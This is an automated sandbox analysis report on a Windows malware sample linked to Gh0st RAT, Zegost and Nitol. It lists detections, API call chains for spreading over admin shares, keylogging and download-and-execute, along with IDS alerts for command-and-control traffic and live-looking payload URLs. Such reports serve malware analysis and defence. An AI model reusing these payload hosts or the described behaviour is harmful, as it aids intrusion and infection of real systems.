                Source: C:\Windows\SysWOW64\033726\RCX773C.tmpAvira: detection malicious, Label: BDS/Zegost.birna
                Source: C:\Windows\Temp\server.exeAvira: detection malicious, Label: BDS/Zegost.birna
                Source: C:\Windows\Temp\v5.exeAvira: detection malicious, Label: TR/Staser.apzjs
                Source: C:\Windows\SysWOW64\034031\RCX8B31.tmpAvira: detection malicious, Label: BDS/Zegost.birna
                Source: C:\Windows\SysWOW64\033726\svchost.exeReversingLabs: Detection: 95%
                Source: C:\Windows\Temp\server.exeReversingLabs: Detection: 95%
                Source: C:\Windows\Temp\v5.exeReversingLabs: Detection: 100%
                Source: C:\Windows\XXXXXX05CA35CC\svchsot.exeReversingLabs: Detection: 95%
                Source: G3izWAY3Fa.exeVirustotal: Detection: 70%Perma Link
                Source: G3izWAY3Fa.exeReversingLabs: Detection: 86%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.1% probability
                Source: C:\Windows\SysWOW64\033726\svchost.exeJoe Sandbox ML: detected
                Source: C:\Windows\SysWOW64\034031\svchost.exeJoe Sandbox ML: detected
                Source: C:\Windows\XXXXXX579E5A5B VVVVVVrr2unw==\svchsot.exeJoe Sandbox ML: detected
                Source: C:\Windows\XXXXXX05CA35CC\svchsot.exeJoe Sandbox ML: detected
                Source: C:\Windows\SysWOW64\033726\RCX773C.tmpJoe Sandbox ML: detected
                Source: C:\Windows\Temp\server.exeJoe Sandbox ML: detected
                Source: C:\Windows\Temp\v5.exeJoe Sandbox ML: detected
                Source: C:\Windows\SysWOW64\034031\RCX8B31.tmpJoe Sandbox ML: detected
                Source: G3izWAY3Fa.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                Source: Binary string: f:\SystemTool Eng 19\SystemTool Eng 16\SystemTool Eng 52\SystemTool\Release\SystemTool.pdb source: G3izWAY3Fa.exe, 00000000.00000002.1327850381.0000000002851000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000005.00000002.2629537891.0000000000465000.00000002.00000001.01000000.00000007.sdmp, .exe, 00000005.00000000.1324754830.0000000000465000.00000002.00000001.01000000.00000007.sdmp, .exe.0.dr
                Source: Binary string: C:\Users\user\AppData\Local\Temp\\Symbols\winload_prod.pdbEG source: .exe, 00000005.00000002.2705569852.000000000249E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\AppData\Local\Temp\\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb source: .exe, 00000005.00000002.2705409189.0000000002340000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\AppData\Local\Temp\\Symbols\winload_prod.pdb source: .exe, 00000005.00000002.2705569852.000000000249E000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: mp\\Symbols\winload_prod.pdb source: .exe, 00000005.00000002.2705409189.0000000002340000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\AppData\Local\Temp\\Symbols\winload_prod.pdb\01AB9056EA9380F71644C4339E3FA1AC2\winload_prod.pdb4 source: .exe, 00000005.00000002.2705409189.0000000002340000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: C:\Users\user\AppData\Local\Temp\\Symbols\ntkrnlmp.pdb source: .exe, 00000005.00000002.2705674625.00000000024E0000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: -00c04fd929dbmp\\Symbols\winload_prod.pdbrord32_super_sbx\Adobe\Acrob source: .exe, 00000005.00000002.2705409189.0000000002340000.00000004.00000020.00020000.00000000.sdmp

                Spreading

                barindex
                Source: C:\Windows\Temp\v5.exeCode function: 4_2_00402AD0 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,memset,lstrcmp,sprintf,sprintf,sprintf,WNetAddConnection2A,Sleep,memset,sprintf,CopyFileA,memset,sprintf,memset,sprintf,memset,sprintf,memset,sprintf,GetLocalTime,memset,sprintf,WinExec,Sleep, \\%s\admin$\g1fd.exe4_2_00402AD0
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeCode function: 0_2_00405302 DeleteFileA,lstrcatA,lstrcatA,lstrlenA,FindFirstFileA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,0_2_00405302
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeCode function: 0_2_0040263E FindFirstFileA,0_2_0040263E
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeCode function: 0_2_00405CD8 FindFirstFileA,FindClose,0_2_00405CD8
                Source: C:\Windows\Temp\server.exeCode function: 3_2_10001A20 GetSystemDirectoryA,wsprintfA,wsprintfA,CreateFileA,CloseHandle,Sleep,Sleep,FindFirstFileA,GetCurrentDirectoryA,strstr,Sleep,GetVersionExA,GetSystemDefaultLCID,Sleep,Sleep,GetLocalTime,wsprintfA,_mkdir,Sleep,GetModuleFileNameA,CopyFileA,wsprintfA,wsprintfA,BeginUpdateResourceA,UpdateResourceA,EndUpdateResourceW,CloseHandle,Sleep,ShellExecuteA,Sleep,GetWindowsDirectoryA,wsprintfA,wsprintfA,_mkdir,_mkdir,_mkdir,_mkdir,URLDownloadToFileA,Sleep,ShellExecuteA,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,3_2_10001A20
                Source: C:\Windows\Temp\server.exeCode function: 3_2_100014B0 GetSystemDirectoryA,FindFirstFileA,CreateFileA,ReadFile,wsprintfA,wsprintfA,CloseHandle,wsprintfA,lstrlen,lstrlen,wsprintfA,lstrlen,3_2_100014B0
                Source: C:\Windows\Temp\server.exeCode function: 3_2_10008B50 lstrlen,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,??2@YAPAXI@Z,??3@YAXPAX@Z,wsprintfA,FindNextFileA,FindClose,3_2_10008B50
                Source: C:\Windows\Temp\server.exeCode function: 3_2_10008520 LocalAlloc,wsprintfA,FindFirstFileA,LocalReAlloc,lstrlen,FindNextFileA,LocalFree,FindClose,3_2_10008520
                Source: C:\Windows\Temp\server.exeCode function: 3_2_10008E40 FindFirstFileA,FindClose,FindClose,3_2_10008E40
                Source: C:\Windows\Temp\server.exeCode function: 3_2_100086F0 wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,3_2_100086F0
                Source: C:\Windows\Temp\server.exeCode function: 3_2_10008F00 FindFirstFileA,FindClose,CreateFileA,CloseHandle,3_2_10008F00
                Source: C:\Windows\Temp\ .exeCode function: 5_2_0045B051 __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,5_2_0045B051
                Source: C:\Windows\Temp\ .exeCode function: 5_2_00405260 FindFirstFileA,GetFileAttributesA,SetFileAttributesA,RemoveDirectoryA,DeleteFileA,FindNextFileA,FindClose,5_2_00405260
                Source: C:\Windows\Temp\ .exeCode function: 5_2_00439D40 #17,__time32,FindFirstFileA,DeleteFileA,5_2_00439D40
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_10001A20 GetSystemDirectoryA,wsprintfA,wsprintfA,CreateFileA,CloseHandle,Sleep,Sleep,FindFirstFileA,GetCurrentDirectoryA,strstr,Sleep,GetVersionExA,GetSystemDefaultLCID,Sleep,Sleep,GetLocalTime,wsprintfA,_mkdir,Sleep,GetModuleFileNameA,CopyFileA,wsprintfA,wsprintfA,BeginUpdateResourceA,UpdateResourceA,EndUpdateResourceW,CloseHandle,Sleep,ShellExecuteA,Sleep,GetWindowsDirectoryA,wsprintfA,wsprintfA,_mkdir,_mkdir,_mkdir,_mkdir,URLDownloadToFileA,Sleep,ShellExecuteA,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,Sleep,URLDownloadToFileA,Sleep,ShellExecuteA,8_2_10001A20
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_10008B50 lstrlen,wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,??2@YAPAXI@Z,??3@YAXPAX@Z,wsprintfA,FindNextFileA,FindClose,8_2_10008B50
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_100014B0 GetSystemDirectoryA,FindFirstFileA,CreateFileA,ReadFile,wsprintfA,wsprintfA,CloseHandle,wsprintfA,lstrlen,lstrlen,wsprintfA,lstrlen,8_2_100014B0
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_10008520 LocalAlloc,wsprintfA,FindFirstFileA,LocalReAlloc,lstrlen,FindNextFileA,LocalFree,FindClose,8_2_10008520
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_10008E40 FindFirstFileA,FindClose,FindClose,8_2_10008E40
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_100086F0 wsprintfA,wsprintfA,FindFirstFileA,wsprintfA,wsprintfA,DeleteFileA,FindNextFileA,FindClose,RemoveDirectoryA,8_2_100086F0
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_10008F00 FindFirstFileA,FindClose,CreateFileA,CloseHandle,8_2_10008F00
                Source: C:\Windows\Temp\server.exeCode function: 3_2_1000AA30 wsprintfA,wsprintfA,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,RegOpenKeyExA,RegQueryValueExA,RegCloseKey,wsprintfA,GetTickCount,wsprintfA,GetComputerNameA,GetUserNameA,wsprintfA,GetLogicalDriveStringsA,lstrlen,GetVolumeInformationA,SHGetFileInfo,lstrlen,lstrlen,GetDiskFreeSpaceExA,lstrlen,wsprintfA,wsprintfA,GlobalMemoryStatusEx,GlobalMemoryStatusEx,wsprintfA,GlobalMemoryStatusEx,wsprintfA,wsprintfA,lstrlen,wsprintfA,_strrev,_strrev,_strrev,_strrev,wsprintfA,wsprintfA,3_2_1000AA30
                Source: C:\Windows\Temp\ .exeFile opened: C:\Users\user\AppData\Local\Microsoft\WindowsJump to behavior
                Source: C:\Windows\Temp\ .exeFile opened: C:\Users\user\AppData\LocalJump to behavior
                Source: C:\Windows\Temp\ .exeFile opened: C:\Users\user\AppData\Local\Microsoft\Windows\History\desktop.iniJump to behavior
                Source: C:\Windows\Temp\ .exeFile opened: C:\Users\user\AppDataJump to behavior
                Source: C:\Windows\Temp\ .exeFile opened: C:\Users\user\AppData\Local\MicrosoftJump to behavior
                Source: C:\Windows\Temp\ .exeFile opened: C:\Users\userJump to behavior

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2013214 - Severity 1 - ET MALWARE Gh0st Remote Access Trojan Encrypted Session To CnC Server : 192.168.2.9:49707 -> 120.48.34.233:8000
                Source: Network trafficSuricata IDS: 2016922 - Severity 1 - ET MALWARE Backdoor family PCRat/Gh0st CnC traffic : 192.168.2.9:49707 -> 120.48.34.233:8000
                Source: Network trafficSuricata IDS: 2048478 - Severity 1 - ET MALWARE [ANY.RUN] Win32/Gh0stRat Keep-Alive : 120.48.34.233:8000 -> 192.168.2.9:49707
                Source: Network trafficSuricata IDS: 2808814 - Severity 1 - ETPRO MALWARE Backdoor family PCRat/Gh0st CnC Response : 120.48.34.233:8000 -> 192.168.2.9:49707
                Source: Network trafficSuricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49720 -> 8.7.198.46:8090
                Source: Network trafficSuricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49713 -> 120.48.34.233:8080
                Source: Network trafficSuricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49774 -> 8.7.198.46:8090
                Source: Network trafficSuricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49767 -> 120.48.34.233:8080
                Source: Network trafficSuricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49814 -> 120.48.34.233:8080
                Source: Network trafficSuricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49820 -> 8.7.198.46:8090
                Source: Network trafficSuricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49857 -> 120.48.34.233:8080
                Source: Network trafficSuricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49865 -> 46.82.174.69:8090
                Source: Network trafficSuricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49901 -> 120.48.34.233:8080
                Source: Network trafficSuricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49912 -> 46.82.174.69:8090
                Source: Network trafficSuricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49945 -> 120.48.34.233:8080
                Source: Network trafficSuricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49956 -> 46.82.174.69:8090
                Source: Network trafficSuricata IDS: 2025135 - Severity 1 - ET MALWARE [PTsecurity] Botnet Nitol.B Checkin : 192.168.2.9:49989 -> 120.48.34.233:8080
                Source: Network trafficSuricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49767 -> 120.48.34.233:8080
                Source: Network trafficSuricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49857 -> 120.48.34.233:8080
                Source: Network trafficSuricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49901 -> 120.48.34.233:8080
                Source: Network trafficSuricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49956 -> 46.82.174.69:8090
                Source: Network trafficSuricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49865 -> 46.82.174.69:8090
                Source: Network trafficSuricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49713 -> 120.48.34.233:8080
                Source: Network trafficSuricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49820 -> 8.7.198.46:8090
                Source: Network trafficSuricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49989 -> 120.48.34.233:8080
                Source: Network trafficSuricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49912 -> 46.82.174.69:8090
                Source: Network trafficSuricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49720 -> 8.7.198.46:8090
                Source: Network trafficSuricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49774 -> 8.7.198.46:8090
                Source: Network trafficSuricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49945 -> 120.48.34.233:8080
                Source: Network trafficSuricata IDS: 2807550 - Severity 1 - ETPRO MALWARE DDoS.Win32/Nitol.B Checkin 3 : 192.168.2.9:49814 -> 120.48.34.233:8080
                Source: C:\Windows\Temp\server.exeCode function: 3_2_1000B6F0 Sleep,wsprintfA,GetTickCount,GetTickCount,wsprintfA,URLDownloadToFileA,GetTempPathA,fopen,fscanf,fscanf,GetTickCount,wsprintfA,GetTickCount,wsprintfA,URLDownloadToFileA,ShellExecuteA,fscanf,fclose,DeleteFileA,Sleep,3_2_1000B6F0
                Source: global trafficTCP traffic: 192.168.2.9:49707 -> 120.48.34.233:8000
                Source: global trafficTCP traffic: 192.168.2.9:49720 -> 8.7.198.46:8090
                Source: global trafficTCP traffic: 192.168.2.9:49865 -> 46.82.174.69:8090
                Source: Joe Sandbox ViewASN Name: CHINANET-BACKBONENo31Jin-rongStreetCN CHINANET-BACKBONENo31Jin-rongStreetCN
                Source: Joe Sandbox ViewASN Name: SPRINGSUS SPRINGSUS
                Source: Joe Sandbox ViewASN Name: DTAGInternetserviceprovideroperationsDE DTAGInternetserviceprovideroperationsDE
                Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
                Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
                Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
                Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
                Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
                Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
                Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
                Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
                Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
                Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
                Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
                Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
                Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
                Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
                Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
                Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
                Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
                Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
                Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
                Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
                Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
                Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
                Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
                Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
                Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
                Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
                Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
                Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
                Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
                Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
                Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
                Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
                Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
                Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
                Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
                Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
                Source: unknownTCP traffic detected without corresponding DNS query: 120.48.34.233
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: C:\Windows\Temp\v5.exeCode function: 2_2_004036C6 select,__WSAFDIsSet,recv,2_2_004036C6
                Source: global trafficDNS traffic detected: DNS query: chinagov.8800.org
                Source: global trafficDNS traffic detected: DNS query: www.wk1888.com
                Source: global trafficDNS traffic detected: DNS query: www.af0575.com
                Source: global trafficDNS traffic detected: DNS query: www.fz0575.com
                Source: v5.exe, 00000004.00000002.2594829199.0000000000678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.168.2.1
                Source: v5.exe, 00000004.00000003.2558799404.0000000000690000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2558799404.00000000006B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.168.2.1/
                Source: v5.exe, 00000004.00000003.1494703239.00000000006B3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.168.2.1/1
                Source: v5.exe, 00000004.00000003.2237287822.0000000000690000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2013456576.0000000000691000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.168.2.1/VZ
                Source: v5.exe, 00000004.00000003.1494703239.00000000006A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.168.2.1/b6
                Source: v5.exe, 00000004.00000002.2594829199.0000000000678000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.168.2.1/h
                Source: v5.exe, 00000004.00000003.2013456576.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2237287822.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000002.2594829199.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2558799404.00000000006C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.168.2.1:80/
                Source: v5.exe, 00000004.00000003.2237287822.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000002.2594829199.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2558799404.00000000006C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.168.2.1:80/4
                Source: v5.exe, 00000004.00000003.1561640538.00000000006A5000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.1494703239.00000000006A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.168.2.1:80/6to4
                Source: v5.exe, 00000004.00000003.2237287822.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000002.2594829199.00000000006C3000.00000004.00000020.00020000.00000000.sdmp, v5.exe, 00000004.00000003.2558799404.00000000006C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.168.2.1:80/_
                Source: v5.exe, 00000004.00000002.2594829199.00000000006C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://192.168.2.1:80/~
                Source: G3izWAY3Fa.exeString found in binary or memory: http://nsis.sf.net/NSIS_Error
                Source: G3izWAY3Fa.exeString found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
                Source: server.exe, 00000003.00000002.2683900710.00000000006DE000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2659797363.0000000000865000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.af0575.com:2011/1.exe
                Source: server.exe, 00000003.00000002.2683900710.0000000000708000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.af0575.com:2011/1.exe8
                Source: svchost.exe, 00000008.00000002.2659797363.0000000000865000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.af0575.com:2011/1.exeb
                Source: svchost.exe, 00000008.00000002.2659797363.0000000000865000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.af0575.com:2011/1.exee
                Source: svchost.exe, 00000008.00000002.2659797363.0000000000865000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.af0575.com:2011/1.exee3
                Source: server.exe, 00000003.00000002.2683900710.00000000006DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.af0575.com:2011/1.exejlt
                Source: svchost.exe, 00000008.00000002.2659797363.0000000000865000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.af0575.com:2011/1.exer
                Source: server.exe, 00000003.00000002.2683900710.00000000006DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.af0575.com:2011/1.exe~l
                Source: server.exe, 00000003.00000002.2683900710.000000000067D000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2659797363.0000000000865000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2631462911.0000000000812000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fz0575.com:2011/1.exe
                Source: server.exe, 00000003.00000002.2683900710.000000000067D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fz0575.com:2011/1.exe-
                Source: server.exe, 00000003.00000002.2683900710.00000000006DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fz0575.com:2011/1.exeNoP
                Source: server.exe, 00000003.00000002.2683900710.00000000006DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fz0575.com:2011/1.exelo~
                Source: server.exe, 00000003.00000002.2683900710.00000000006DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fz0575.com:2011/1.exepoj
                Source: svchost.exe, 00000008.00000002.2659797363.0000000000865000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fz0575.com:2011/1.exer
                Source: server.exe, 00000003.00000002.2683900710.0000000000708000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.fz0575.com:2011/1.exew
                Source: server.exe, 00000003.00000002.2683900710.00000000006DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.wk1888.com/
                Source: svchost.exe, 00000008.00000002.2659797363.0000000000865000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.wk1888.com:2011/1.exe
                Source: svchost.exe, 00000008.00000002.2659797363.0000000000865000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.wk1888.com:2011/1.exer
                Source: server.exe, 00000003.00000002.2683900710.00000000006DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.wk1888.com:2011/1.exetlV
                Source: .exe, 00000005.00000002.2705462292.000000000234B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://api.msn.com/v1/News/Feed/Windows?apikey=qrUeHGGY
                Source: .exe, 00000005.00000002.2705462292.000000000234B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://deff.nelreports.net/api/report?cat=msn
                Source: server.exe, 00000003.00000002.2683900710.00000000006F3000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000008.00000002.2659797363.0000000000880000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
                Source: .exe, 00000005.00000002.2705732452.0000000002550000.00000004.00000020.00020000.00000000.sdmp, .exe, 00000005.00000002.2682490023.00000000006B2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: .exe, 00000005.00000002.2682490023.000000000069D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033BKSLMEM
                Source: .exe, 00000005.00000002.2682490023.000000000069D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033FYMLMEM
                Source: .exe, 00000005.00000002.2705732452.0000000002550000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: .exe, 00000005.00000002.2682490023.000000000071F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://oneclient.sfx.ms/Win/Prod/741e3ez

                Key, Mouse, Clipboard, Microphone and Screen Capturing

                barindex
                Source: C:\Windows\Temp\server.exeCode function: <BackSpace>3_2_10009A00
                Source: C:\Windows\Temp\server.exeCode function: <Enter>3_2_10009A00
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: <BackSpace>8_2_10009A00
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: <Enter>8_2_10009A00
                Source: C:\Users\user\Desktop\G3izWAY3Fa.exeCode function: 0_2_00404EB9 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,SendMessageA,ShowWindow,ShowWindow,GetDlgItem,SendMessageA,SendMessageA,SendMessageA,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageA,CreatePopupMenu,AppendMenuA,GetWindowRect,TrackPopupMenu,SendMessageA,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageA,GlobalUnlock,SetClipboardData,CloseClipboard,0_2_00404EB9
                Source: C:\Windows\Temp\server.exeCode function: 3_2_1000FA20 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,3_2_1000FA20
                Source: C:\Windows\SysWOW64\033726\svchost.exeCode function: 8_2_1000FA20 OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,8_2_1000FA20
